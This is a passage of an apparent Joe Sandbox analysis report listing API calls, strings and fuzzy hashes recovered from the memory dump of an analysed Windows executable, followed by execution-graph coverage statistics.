                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1386444988-0
                                                                                                                                                                                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                              • String ID: d=E
                                                                                                                                                                                                                              • API String ID: 909852535-3703654223
                                                                                                                                                                                                                              • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                                                              • API String ID: 1983396471-123907689
                                                                                                                                                                                                                              • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                              • String ID: URL
                                                                                                                                                                                                                              • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                              • String ID: %2.2X
                                                                                                                                                                                                                              • API String ID: 2789212964-323797159
                                                                                                                                                                                                                              • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _snwprintf
                                                                                                                                                                                                                              • String ID: %%-%d.%ds
                                                                                                                                                                                                                              • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                              • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                              • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSendmemset
                                                                                                                                                                                                                              • String ID: F^@
                                                                                                                                                                                                                              • API String ID: 568519121-3652327722
                                                                                                                                                                                                                              • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PlacementWindowmemset
                                                                                                                                                                                                                              • String ID: WinPos
                                                                                                                                                                                                                              • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                              • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                              • String ID: _lng.ini
                                                                                                                                                                                                                              • API String ID: 383090722-1948609170
                                                                                                                                                                                                                              • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                              • API String ID: 2773794195-880857682
                                                                                                                                                                                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 438689982-0
                                                                                                                                                                                                                              • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??2@$memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1860491036-0
                                                                                                                                                                                                                              • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                              • free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                              • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 726966127-0
                                                                                                                                                                                                                              • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                                                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                              • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                              • free.MSVCRT ref: 0040B224
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 726966127-0
                                                                                                                                                                                                                              • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                                                                                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                                                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                                                                                                                              • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcmp$memcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 231171946-0
                                                                                                                                                                                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                              • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                              • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3669619086-0
                                                                                                                                                                                                                              • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                              • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                              • free.MSVCRT ref: 00417425
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2605342592-0
                                                                                                                                                                                                                              • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                                                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1961120804-0
                                                                                                                                                                                                                              • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:2.3%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:20.6%
                                                                                                                                                                                                                              Signature Coverage:0.2%
                                                                                                                                                                                                                              Total number of Nodes:839
                                                                                                                                                                                                                              Total number of Limit Nodes:18
